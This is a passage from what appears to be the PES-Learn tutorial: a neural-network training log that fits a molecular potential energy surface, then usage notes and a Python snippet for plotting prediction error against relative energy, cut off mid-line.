Full dataset contains 300 points.\nUsing structure_based training set point sampling.\nErrors are root-mean-square error in wavenumbers (cm-1)\n\nPerforming neural architecture search...\n\nHidden layer structure: [32]\nHyperparameters: {'morse_transform': {'morse': False}, 'scale_X': {'scale_X': 'std', 'activation': 'tanh'}, 'scale_y': 'std', 'pip': {'degree_reduction': False, 'pip': True}, 'layers': [32]}\nTest set RMSE (cm-1): 5.11 Validation set RMSE (cm-1): 5.03 Full dataset RMSE (cm-1): 4.40\nHidden layer structure: [64]\nHyperparameters: {'morse_transform': {'morse': False}, 'scale_X': {'scale_X': 'std', 'activation': 'tanh'}, 'scale_y': 'std', 'pip': {'degree_reduction': False, 'pip': True}, 'layers': [64]}\nTest set RMSE (cm-1): 6.30 Validation set RMSE (cm-1): 4.59 Full dataset RMSE (cm-1): 5.06\nHidden layer structure: [16, 16, 16]\nHyperparameters: {'morse_transform': {'morse': False}, 'scale_X': {'scale_X': 'std', 'activation': 'tanh'}, 'scale_y': 'std', 'pip': {'degree_reduction': False, 'pip': True}, 'layers': [16, 16, 16]}\nTest set RMSE (cm-1): 5.83 Validation set RMSE (cm-1): 6.52 Full dataset RMSE (cm-1): 4.99\nHidden layer structure: [32, 32]\nHyperparameters: {'morse_transform': {'morse': False}, 'scale_X': {'scale_X': 'std', 'activation': 'tanh'}, 'scale_y': 'std', 'pip': {'degree_reduction': False, 'pip': True}, 'layers': [32, 32]}\nTest set RMSE (cm-1): 1.67 Validation set RMSE (cm-1): 1.69 Full dataset RMSE (cm-1): 1.57\n\nNeural architecture search complete. Best hidden layer structures: [[32, 32], [32], [16, 16, 16]]\n\nBeginning hyperparameter optimization...\nTrying 15 combinations of hyperparameters\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': True, 'morse_alpha': 1.6}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 2.98 Validation set RMSE (cm-1): 2.67 Full dataset RMSE (cm-1): 2.94\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'mm01'}\nTest set RMSE (cm-1): 17.35 Validation set RMSE (cm-1): 16.15 Full dataset RMSE (cm-1): 17.24\nHyperparameters: \n{'layers': (32, 32), 'morse_transform': {'morse': True, 'morse_alpha': 1.6}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'mm01'}\nTest set RMSE (cm-1): inf Validation set RMSE (cm-1): inf Full dataset RMSE (cm-1): inf\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': True, 'morse_alpha': 1.9000000000000001}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 4.13 Validation set RMSE (cm-1): 4.00 Full dataset RMSE (cm-1): 3.65\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 1.49 Validation set RMSE (cm-1): 1.42 Full dataset RMSE (cm-1): 1.31\nHyperparameters: \n{'layers': (32, 32), 'morse_transform': {'morse': True, 'morse_alpha': 1.6}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): inf Validation set RMSE (cm-1): inf Full dataset RMSE (cm-1): inf\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': 
False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 25623.45 Validation set RMSE (cm-1): 44170.74 Full dataset RMSE (cm-1): 20903.16\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 4.87 Validation set RMSE (cm-1): 3.20 Full dataset RMSE (cm-1): 3.10\nHyperparameters: \n{'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 0.81 Validation set RMSE (cm-1): 0.82 Full dataset RMSE (cm-1): 0.71\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 2.61 Validation set RMSE (cm-1): 2.43 Full dataset RMSE (cm-1): 2.11\nHyperparameters: \n{'layers': (32, 32), 'morse_transform': {'morse': True, 'morse_alpha': 1.5}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 4.09 Validation set RMSE (cm-1): 3.02 Full dataset RMSE (cm-1): 3.41\nHyperparameters: \n{'layers': (32,), 'morse_transform': {'morse': True, 'morse_alpha': 1.8}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 1.99 Validation set RMSE (cm-1): 1.93 Full dataset RMSE (cm-1): 2.23\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm01'}\nTest set RMSE (cm-1): inf Validation set RMSE (cm-1): inf Full dataset RMSE (cm-1): inf\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 5.83 Validation set RMSE (cm-1): 6.52 Full dataset RMSE (cm-1): 4.99\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': True, 'morse_alpha': 1.6}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 2.82 Validation set RMSE (cm-1): 2.70 Full dataset RMSE (cm-1): 2.61\n\n###################################################\n# #\n# Hyperparameter Optimization Complete!!! 
#\n# #\n###################################################\n\nBest performing hyperparameters are:\n[('layers', (32, 32)), ('morse_transform', {'morse': False}), ('pip', {'degree_reduction': True, 'pip': True}), ('scale_X', {'activation': 'tanh', 'scale_X': 'std'}), ('scale_y', 'std')]\nOptimizing learning rate...\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 1.0}\nTest set RMSE (cm-1): 316275944698408704.00 Validation set RMSE (cm-1): 278706602952744288.00 Full dataset RMSE (cm-1): 269540779801922272.00\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.8}\nTest set RMSE (cm-1): 5.71 Validation set RMSE (cm-1): 4.43 Full dataset RMSE (cm-1): 3.70\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.6}\nTest set RMSE (cm-1): 42.92 Validation set RMSE (cm-1): 27.75 Full dataset RMSE (cm-1): 21.25\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.5}\nTest set RMSE (cm-1): 0.81 Validation set RMSE (cm-1): 0.82 Full dataset RMSE (cm-1): 0.71\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.4}\nTest set RMSE (cm-1): 1.30 Validation set RMSE (cm-1): 0.98 Full dataset RMSE (cm-1): 1.06\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.2}\nTest set RMSE (cm-1): 1.50 Validation set RMSE (cm-1): 1.12 Full dataset RMSE (cm-1): 1.19\nFine-tuning final model...\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.5}\nEpoch 1 Validation RMSE (cm-1): 2008.26\nEpoch 2 Validation RMSE (cm-1): 719.83\nEpoch 3 Validation RMSE (cm-1): 411.05\nEpoch 4 Validation RMSE (cm-1): 221.48\nEpoch 5 Validation RMSE (cm-1): 173.03\nEpoch 6 Validation RMSE (cm-1): 149.78\nEpoch 7 Validation RMSE (cm-1): 135.74\nEpoch 8 Validation RMSE (cm-1): 116.26\nEpoch 9 Validation RMSE (cm-1): 93.12\nEpoch 10 Validation RMSE (cm-1): 84.77\nEpoch 11 Validation RMSE (cm-1): 76.86\nEpoch 12 Validation RMSE (cm-1): 72.43\nEpoch 13 Validation RMSE (cm-1): 67.05\nEpoch 14 Validation RMSE (cm-1): 67.59\nEpoch 15 Validation RMSE (cm-1): 56.94\nEpoch 16 Validation RMSE (cm-1): 52.21\nEpoch 17 Validation RMSE (cm-1): 50.24\nEpoch 18 Validation RMSE (cm-1): 43.04\nEpoch 19 Validation RMSE (cm-1): 40.72\nEpoch 20 Validation RMSE (cm-1): 40.88\nEpoch 21 Validation RMSE (cm-1): 38.65\nEpoch 22 Validation RMSE (cm-1): 37.24\nEpoch 23 Validation RMSE (cm-1): 35.34\nEpoch 24 Validation RMSE (cm-1): 33.33\nEpoch 25 Validation RMSE (cm-1): 31.03\nEpoch 26 Validation RMSE (cm-1): 29.64\nEpoch 27 Validation RMSE (cm-1): 28.02\nEpoch 28 Validation RMSE (cm-1): 28.82\nEpoch 29 Validation RMSE (cm-1): 
28.59\nEpoch 30 Validation RMSE (cm-1): 30.28\nEpoch 31 Validation RMSE (cm-1): 27.81\nEpoch 32 Validation RMSE (cm-1): 28.24\nEpoch 33 Validation RMSE (cm-1): 28.89\nEpoch 34 Validation RMSE (cm-1): 27.64\nEpoch 35 Validation RMSE (cm-1): 25.40\nEpoch 36 Validation RMSE (cm-1): 23.92\nEpoch 37 Validation RMSE (cm-1): 21.53\nEpoch 38 Validation RMSE (cm-1): 21.10\nEpoch 39 Validation RMSE (cm-1): 20.71\nEpoch 40 Validation RMSE (cm-1): 20.27\nEpoch 41 Validation RMSE (cm-1): 19.77\nEpoch 42 Validation RMSE (cm-1): 19.11\nEpoch 43 Validation RMSE (cm-1): 18.45\nEpoch 44 Validation RMSE (cm-1): 17.98\nEpoch 45 Validation RMSE (cm-1): 17.42\nEpoch 46 Validation RMSE (cm-1): 17.33\nEpoch 47 Validation RMSE (cm-1): 16.71\nEpoch 48 Validation RMSE (cm-1): 15.71\nEpoch 49 Validation RMSE (cm-1): 14.87\nEpoch 50 Validation RMSE (cm-1): 13.95\nEpoch 51 Validation RMSE (cm-1): 13.34\nEpoch 52 Validation RMSE (cm-1): 13.34\nEpoch 53 Validation RMSE (cm-1): 12.74\nEpoch 54 Validation RMSE (cm-1): 12.85\nEpoch 55 Validation RMSE (cm-1): 12.85\nEpoch 56 Validation RMSE (cm-1): 13.28\nEpoch 57 Validation RMSE (cm-1): 13.33\nEpoch 58 Validation RMSE (cm-1): 12.97\nEpoch 59 Validation RMSE (cm-1): 11.80\nEpoch 60 Validation RMSE (cm-1): 11.24\nEpoch 61 Validation RMSE (cm-1): 10.88\nEpoch 62 Validation RMSE (cm-1): 10.15\nEpoch 63 Validation RMSE (cm-1): 9.99\nEpoch 64 Validation RMSE (cm-1): 9.91\nEpoch 65 Validation RMSE (cm-1): 9.44\nEpoch 66 Validation RMSE (cm-1): 9.23\nEpoch 67 Validation RMSE (cm-1): 9.08\nEpoch 68 Validation RMSE (cm-1): 8.83\nEpoch 69 Validation RMSE (cm-1): 8.84\nEpoch 70 Validation RMSE (cm-1): 8.66\nEpoch 71 Validation RMSE (cm-1): 8.35\nEpoch 72 Validation RMSE (cm-1): 8.19\nEpoch 73 Validation RMSE (cm-1): 8.15\nEpoch 74 Validation RMSE (cm-1): 7.91\nEpoch 75 Validation RMSE (cm-1): 7.93\nEpoch 76 Validation RMSE (cm-1): 7.68\nEpoch 77 Validation RMSE (cm-1): 7.59\nEpoch 78 Validation RMSE (cm-1): 7.66\nEpoch 79 Validation RMSE (cm-1): 7.27\nEpoch 80 Validation RMSE (cm-1): 7.03\nEpoch 81 Validation RMSE (cm-1): 6.82\nEpoch 82 Validation RMSE (cm-1): 6.95\nEpoch 83 Validation RMSE (cm-1): 6.64\nEpoch 84 Validation RMSE (cm-1): 6.51\nEpoch 85 Validation RMSE (cm-1): 6.41\nEpoch 86 Validation RMSE (cm-1): 6.49\nEpoch 87 Validation RMSE (cm-1): 6.64\nEpoch 88 Validation RMSE (cm-1): 6.73\nEpoch 89 Validation RMSE (cm-1): 6.77\nEpoch 90 Validation RMSE (cm-1): 6.72\nEpoch 91 Validation RMSE (cm-1): 6.71\nEpoch 92 Validation RMSE (cm-1): 6.43\nEpoch 93 Validation RMSE (cm-1): 6.25\nEpoch 94 Validation RMSE (cm-1): 6.23\nEpoch 95 Validation RMSE (cm-1): 6.18\nEpoch 96 Validation RMSE (cm-1): 6.14\nEpoch 97 Validation RMSE (cm-1): 6.06\nEpoch 98 Validation RMSE (cm-1): 5.73\nEpoch 99 Validation RMSE (cm-1): 5.54\nEpoch 100 Validation RMSE (cm-1): 5.10\nEpoch 101 Validation RMSE (cm-1): 4.82\nEpoch 102 Validation RMSE (cm-1): 4.75\nEpoch 103 Validation RMSE (cm-1): 4.74\nEpoch 104 Validation RMSE (cm-1): 4.66\nEpoch 105 Validation RMSE (cm-1): 4.68\nEpoch 106 Validation RMSE (cm-1): 4.58\nEpoch 107 Validation RMSE (cm-1): 4.60\nEpoch 108 Validation RMSE (cm-1): 4.56\nEpoch 109 Validation RMSE (cm-1): 4.48\nEpoch 110 Validation RMSE (cm-1): 4.36\nEpoch 111 Validation RMSE (cm-1): 4.37\nEpoch 112 Validation RMSE (cm-1): 4.31\nEpoch 113 Validation RMSE (cm-1): 4.22\nEpoch 114 Validation RMSE (cm-1): 4.22\nEpoch 115 Validation RMSE (cm-1): 4.23\nEpoch 116 Validation RMSE (cm-1): 4.19\nEpoch 117 Validation RMSE (cm-1): 4.25\nEpoch 118 Validation RMSE (cm-1): 4.01\nEpoch 119 Validation 
RMSE (cm-1): 3.89\nEpoch 120 Validation RMSE (cm-1): 3.83\nEpoch 121 Validation RMSE (cm-1): 3.90\nEpoch 122 Validation RMSE (cm-1): 3.89\nEpoch 123 Validation RMSE (cm-1): 3.87\nEpoch 124 Validation RMSE (cm-1): 3.90\nEpoch 125 Validation RMSE (cm-1): 3.96\nEpoch 126 Validation RMSE (cm-1): 3.91\nEpoch 127 Validation RMSE (cm-1): 3.89\nEpoch 128 Validation RMSE (cm-1): 3.98\nEpoch 129 Validation RMSE (cm-1): 4.01\nEpoch 130 Validation RMSE (cm-1): 3.93\nEpoch 131 Validation RMSE (cm-1): 3.77\nEpoch 132 Validation RMSE (cm-1): 3.59\nEpoch 133 Validation RMSE (cm-1): 3.33\nEpoch 134 Validation RMSE (cm-1): 3.22\nEpoch 135 Validation RMSE (cm-1): 3.26\nEpoch 136 Validation RMSE (cm-1): 3.26\nEpoch 137 Validation RMSE (cm-1): 3.26\nEpoch 138 Validation RMSE (cm-1): 3.30\nEpoch 139 Validation RMSE (cm-1): 3.23\nEpoch 140 Validation RMSE (cm-1): 3.13\nEpoch 141 Validation RMSE (cm-1): 3.23\nEpoch 142 Validation RMSE (cm-1): 3.23\nEpoch 143 Validation RMSE (cm-1): 3.22\nEpoch 144 Validation RMSE (cm-1): 3.25\nEpoch 145 Validation RMSE (cm-1): 3.26\nEpoch 146 Validation RMSE (cm-1): 3.09\nEpoch 147 Validation RMSE (cm-1): 3.02\nEpoch 148 Validation RMSE (cm-1): 3.01\nEpoch 149 Validation RMSE (cm-1): 3.04\nEpoch 150 Validation RMSE (cm-1): 2.96\nEpoch 151 Validation RMSE (cm-1): 2.92\nEpoch 152 Validation RMSE (cm-1): 2.88\nEpoch 153 Validation RMSE (cm-1): 2.87\nEpoch 154 Validation RMSE (cm-1): 2.83\nEpoch 155 Validation RMSE (cm-1): 2.91\nEpoch 156 Validation RMSE (cm-1): 2.86\nEpoch 157 Validation RMSE (cm-1): 2.88\nEpoch 158 Validation RMSE (cm-1): 2.78\nEpoch 159 Validation RMSE (cm-1): 2.72\nEpoch 160 Validation RMSE (cm-1): 2.78\nEpoch 161 Validation RMSE (cm-1): 2.78\nEpoch 162 Validation RMSE (cm-1): 2.77\nEpoch 163 Validation RMSE (cm-1): 2.82\nEpoch 164 Validation RMSE (cm-1): 2.82\nEpoch 165 Validation RMSE (cm-1): 2.82\nEpoch 166 Validation RMSE (cm-1): 2.76\nEpoch 167 Validation RMSE (cm-1): 2.75\nEpoch 168 Validation RMSE (cm-1): 2.77\nEpoch 169 Validation RMSE (cm-1): 2.75\nEpoch 170 Validation RMSE (cm-1): 2.75\nEpoch 171 Validation RMSE (cm-1): 2.79\nEpoch 172 Validation RMSE (cm-1): 2.80\nEpoch 173 Validation RMSE (cm-1): 2.71\nEpoch 174 Validation RMSE (cm-1): 2.71\nEpoch 175 Validation RMSE (cm-1): 2.71\nEpoch 176 Validation RMSE (cm-1): 2.70\nEpoch 177 Validation RMSE (cm-1): 2.70\nEpoch 178 Validation RMSE (cm-1): 2.68\nEpoch 179 Validation RMSE (cm-1): 2.68\nEpoch 180 Validation RMSE (cm-1): 2.65\nEpoch 181 Validation RMSE (cm-1): 2.64\nEpoch 182 Validation RMSE (cm-1): 2.63\nEpoch 183 Validation RMSE (cm-1): 2.60\nEpoch 184 Validation RMSE (cm-1): 2.56\nEpoch 185 Validation RMSE (cm-1): 2.58\nEpoch 186 Validation RMSE (cm-1): 2.57\nEpoch 187 Validation RMSE (cm-1): 2.55\nEpoch 188 Validation RMSE (cm-1): 2.53\nEpoch 189 Validation RMSE (cm-1): 2.52\nEpoch 190 Validation RMSE (cm-1): 2.51\nEpoch 191 Validation RMSE (cm-1): 2.44\nEpoch 192 Validation RMSE (cm-1): 2.34\nEpoch 193 Validation RMSE (cm-1): 2.29\nEpoch 194 Validation RMSE (cm-1): 2.24\nEpoch 195 Validation RMSE (cm-1): 2.20\nEpoch 196 Validation RMSE (cm-1): 2.24\nEpoch 197 Validation RMSE (cm-1): 2.24\nEpoch 198 Validation RMSE (cm-1): 2.25\nEpoch 199 Validation RMSE (cm-1): 2.25\nEpoch 200 Validation RMSE (cm-1): 2.23\nEpoch 201 Validation RMSE (cm-1): 2.25\nEpoch 202 Validation RMSE (cm-1): 2.25\nEpoch 203 Validation RMSE (cm-1): 2.25\nEpoch 204 Validation RMSE (cm-1): 2.24\nEpoch 205 Validation RMSE (cm-1): 2.25\nEpoch 206 Validation RMSE (cm-1): 2.25\nEpoch 207 Validation RMSE (cm-1): 2.23\nEpoch 208 
Validation RMSE (cm-1): 2.17\nEpoch 209 Validation RMSE (cm-1): 2.11\nEpoch 210 Validation RMSE (cm-1): 2.11\nEpoch 211 Validation RMSE (cm-1): 2.06\nEpoch 212 Validation RMSE (cm-1): 2.04\nEpoch 213 Validation RMSE (cm-1): 2.00\nEpoch 214 Validation RMSE (cm-1): 1.91\nEpoch 215 Validation RMSE (cm-1): 1.85\nEpoch 216 Validation RMSE (cm-1): 1.87\nEpoch 217 Validation RMSE (cm-1): 1.83\nEpoch 218 Validation RMSE (cm-1): 1.82\nEpoch 219 Validation RMSE (cm-1): 1.82\nEpoch 220 Validation RMSE (cm-1): 1.81\nEpoch 221 Validation RMSE (cm-1): 1.81\nEpoch 222 Validation RMSE (cm-1): 1.80\nEpoch 223 Validation RMSE (cm-1): 1.82\nEpoch 224 Validation RMSE (cm-1): 1.77\nEpoch 225 Validation RMSE (cm-1): 1.76\nEpoch 226 Validation RMSE (cm-1): 1.72\nEpoch 227 Validation RMSE (cm-1): 1.67\nEpoch 228 Validation RMSE (cm-1): 1.61\nEpoch 229 Validation RMSE (cm-1): 1.53\nEpoch 230 Validation RMSE (cm-1): 1.57\nEpoch 231 Validation RMSE (cm-1): 1.60\nEpoch 232 Validation RMSE (cm-1): 1.61\nEpoch 233 Validation RMSE (cm-1): 1.63\nEpoch 234 Validation RMSE (cm-1): 1.62\nEpoch 235 Validation RMSE (cm-1): 1.58\nEpoch 236 Validation RMSE (cm-1): 1.53\nEpoch 237 Validation RMSE (cm-1): 1.53\nEpoch 238 Validation RMSE (cm-1): 1.52\nEpoch 239 Validation RMSE (cm-1): 1.52\nEpoch 240 Validation RMSE (cm-1): 1.53\nEpoch 241 Validation RMSE (cm-1): 1.52\nEpoch 242 Validation RMSE (cm-1): 1.52\nEpoch 243 Validation RMSE (cm-1): 1.52\nEpoch 244 Validation RMSE (cm-1): 1.53\nEpoch 245 Validation RMSE (cm-1): 1.53\nEpoch 246 Validation RMSE (cm-1): 1.53\nEpoch 247 Validation RMSE (cm-1): 1.53\nEpoch 248 Validation RMSE (cm-1): 1.52\nEpoch 249 Validation RMSE (cm-1): 1.51\nEpoch 250 Validation RMSE (cm-1): 1.51\nEpoch 251 Validation RMSE (cm-1): 1.51\nEpoch 252 Validation RMSE (cm-1): 1.51\nEpoch 253 Validation RMSE (cm-1): 1.51\nEpoch 254 Validation RMSE (cm-1): 1.51\nEpoch 255 Validation RMSE (cm-1): 1.51\nEpoch 256 Validation RMSE (cm-1): 1.50\nEpoch 257 Validation RMSE (cm-1): 1.49\nEpoch 258 Validation RMSE (cm-1): 1.46\nEpoch 259 Validation RMSE (cm-1): 1.50\nEpoch 260 Validation RMSE (cm-1): 1.46\nEpoch 261 Validation RMSE (cm-1): 1.45\nEpoch 262 Validation RMSE (cm-1): 1.43\nEpoch 263 Validation RMSE (cm-1): 1.44\nEpoch 264 Validation RMSE (cm-1): 1.45\nEpoch 265 Validation RMSE (cm-1): 1.46\nEpoch 266 Validation RMSE (cm-1): 1.46\nEpoch 267 Validation RMSE (cm-1): 1.46\nEpoch 268 Validation RMSE (cm-1): 1.45\nEpoch 269 Validation RMSE (cm-1): 1.44\nEpoch 270 Validation RMSE (cm-1): 1.42\nEpoch 271 Validation RMSE (cm-1): 1.43\nEpoch 272 Validation RMSE (cm-1): 1.41\nEpoch 273 Validation RMSE (cm-1): 1.37\nEpoch 274 Validation RMSE (cm-1): 1.35\nEpoch 275 Validation RMSE (cm-1): 1.30\nEpoch 276 Validation RMSE (cm-1): 1.30\nEpoch 277 Validation RMSE (cm-1): 1.31\nEpoch 278 Validation RMSE (cm-1): 1.32\nEpoch 279 Validation RMSE (cm-1): 1.28\nEpoch 280 Validation RMSE (cm-1): 1.30\nEpoch 281 Validation RMSE (cm-1): 1.30\nEpoch 282 Validation RMSE (cm-1): 1.29\nEpoch 283 Validation RMSE (cm-1): 1.28\nEpoch 284 Validation RMSE (cm-1): 1.28\nEpoch 285 Validation RMSE (cm-1): 1.28\nEpoch 286 Validation RMSE (cm-1): 1.28\nEpoch 287 Validation RMSE (cm-1): 1.28\nEpoch 288 Validation RMSE (cm-1): 1.29\nEpoch 289 Validation RMSE (cm-1): 1.28\nEpoch 290 Validation RMSE (cm-1): 1.28\nEpoch 291 Validation RMSE (cm-1): 1.28\nEpoch 292 Validation RMSE (cm-1): 1.29\nEpoch 293 Validation RMSE (cm-1): 1.27\nEpoch 294 Validation RMSE (cm-1): 1.26\nEpoch 295 Validation RMSE (cm-1): 1.26\nEpoch 296 Validation RMSE (cm-1): 
1.26\nEpoch 297 Validation RMSE (cm-1): 1.25\nEpoch 298 Validation RMSE (cm-1): 1.25\nEpoch 299 Validation RMSE (cm-1): 1.26\nEpoch 300 Validation RMSE (cm-1): 1.26\nEpoch 301 Validation RMSE (cm-1): 1.27\nEpoch 302 Validation RMSE (cm-1): 1.27\nEpoch 303 Validation RMSE (cm-1): 1.24\nEpoch 304 Validation RMSE (cm-1): 1.21\nEpoch 305 Validation RMSE (cm-1): 1.17\nEpoch 306 Validation RMSE (cm-1): 1.21\nEpoch 307 Validation RMSE (cm-1): 1.21\nEpoch 308 Validation RMSE (cm-1): 1.19\nEpoch 309 Validation RMSE (cm-1): 1.19\nEpoch 310 Validation RMSE (cm-1): 1.21\nEpoch 311 Validation RMSE (cm-1): 1.20\nEpoch 312 Validation RMSE (cm-1): 1.19\nEpoch 313 Validation RMSE (cm-1): 1.18\nEpoch 314 Validation RMSE (cm-1): 1.18\nEpoch 315 Validation RMSE (cm-1): 1.16\nEpoch 316 Validation RMSE (cm-1): 1.14\nEpoch 317 Validation RMSE (cm-1): 1.12\nEpoch 318 Validation RMSE (cm-1): 1.11\nEpoch 319 Validation RMSE (cm-1): 1.10\nEpoch 320 Validation RMSE (cm-1): 1.10\nEpoch 321 Validation RMSE (cm-1): 1.10\nEpoch 322 Validation RMSE (cm-1): 1.10\nEpoch 323 Validation RMSE (cm-1): 1.11\nEpoch 324 Validation RMSE (cm-1): 1.12\nEpoch 325 Validation RMSE (cm-1): 1.13\nEpoch 326 Validation RMSE (cm-1): 1.11\nEpoch 327 Validation RMSE (cm-1): 1.11\nEpoch 328 Validation RMSE (cm-1): 1.11\nEpoch 329 Validation RMSE (cm-1): 1.10\nEpoch 330 Validation RMSE (cm-1): 1.10\nEpoch 331 Validation RMSE (cm-1): 1.10\nEpoch 332 Validation RMSE (cm-1): 1.10\nEpoch 333 Validation RMSE (cm-1): 1.10\nEpoch 334 Validation RMSE (cm-1): 1.10\nEpoch 335 Validation RMSE (cm-1): 1.10\nEpoch 336 Validation RMSE (cm-1): 1.10\nEpoch 337 Validation RMSE (cm-1): 1.10\nEpoch 338 Validation RMSE (cm-1): 1.10\nEpoch 339 Validation RMSE (cm-1): 1.10\nEpoch 340 Validation RMSE (cm-1): 1.10\nEpoch 341 Validation RMSE (cm-1): 1.10\nEpoch 342 Validation RMSE (cm-1): 1.11\nEpoch 343 Validation RMSE (cm-1): 1.11\nEpoch 344 Validation RMSE (cm-1): 1.10\nEpoch 345 Validation RMSE (cm-1): 1.11\nEpoch 346 Validation RMSE (cm-1): 1.09\nEpoch 347 Validation RMSE (cm-1): 1.09\nEpoch 348 Validation RMSE (cm-1): 1.08\nEpoch 349 Validation RMSE (cm-1): 1.07\nEpoch 350 Validation RMSE (cm-1): 1.05\nEpoch 351 Validation RMSE (cm-1): 1.05\nEpoch 352 Validation RMSE (cm-1): 1.05\nEpoch 353 Validation RMSE (cm-1): 1.02\nEpoch 354 Validation RMSE (cm-1): 0.96\nEpoch 355 Validation RMSE (cm-1): 0.95\nTest set RMSE (cm-1): 1.04 Validation set RMSE (cm-1): 0.95 Full dataset RMSE (cm-1): 0.80\nModel optimization complete. Saving final model...\nSaving ML model data...\nTotal run time: 957.76 seconds\n```\n</details>\n\n\nThe final result is a Test/Validation/Full dataset RMSE (cm-1) of 1.04, 0.95, and 0.80, respectively. Not quite as good as the GP models, but still about as accurate as you would ever want it to be! \n\n### 3.4 Using the Neural Network models\nThe neural networks can be used in the exact same way as the GP models outlined above in section 3.2! The trained model is easily accessible using the `compute_energy.py` file (see the short usage sketch below). Model performance and the datasets are also saved. \n\n\n### 3.5 Analyzing model performance using Python\nOne can use Python to further analyze the performance of a PES-Learn ML model. Here's a simple example of how to evaluate a model's error as a function of energy relative to the global minimum. 
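First, a minimal usage sketch of querying the trained model directly (the `pes` call signature, its `cartesian` keyword, and the Hartree energy units are taken from the `analyze.py` example below; the geometry values here are made-up placeholders):\n\n```python\nfrom compute_energy import pes\n\n# Placeholder geometry rows, laid out like the coordinate columns of PES.dat\nnew_geoms = [[0.95, 0.95, 104.5]]\n\n# Energies come back in Hartrees (consistent with the 627.509 kcal/mol conversion used below)\nprint(pes(new_geoms, cartesian=False))\n```\n\n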
The following python file `analyze.py` must be in the same directory as the auto-generated `compute_energy.py` file, the dataset file `PES.dat`, and the saved ML model file `model.json` or `model.pt` depending on if it is a GP or NN model. \n\n```python\nfrom compute_energy import pes\nimport pandas as pd\n\n# load data\nfull_dataset = pd.read_csv('PES.dat')\n# Split data into column arrays of geometries and energies\ngeoms = full_dataset.values[:, :-1]\nenergies = full_dataset.values[:, -1].reshape(-1,1)\n\n# Geometries are ready to be sent through the model\npredicted_energies = pes(geoms, cartesian=False)\n\n# Prepare a plot of energy vs prediction error\nrelative_energies = (energies - energies.min())\nerrors = predicted_energies - energies\n\n\n# Plot error distribution\nimport matplotlib.pyplot as plt\nrelative_energies *= 627.509 # convert to kcal/mol\nerrors *= 627.509\nplt.scatter(relative_energies, 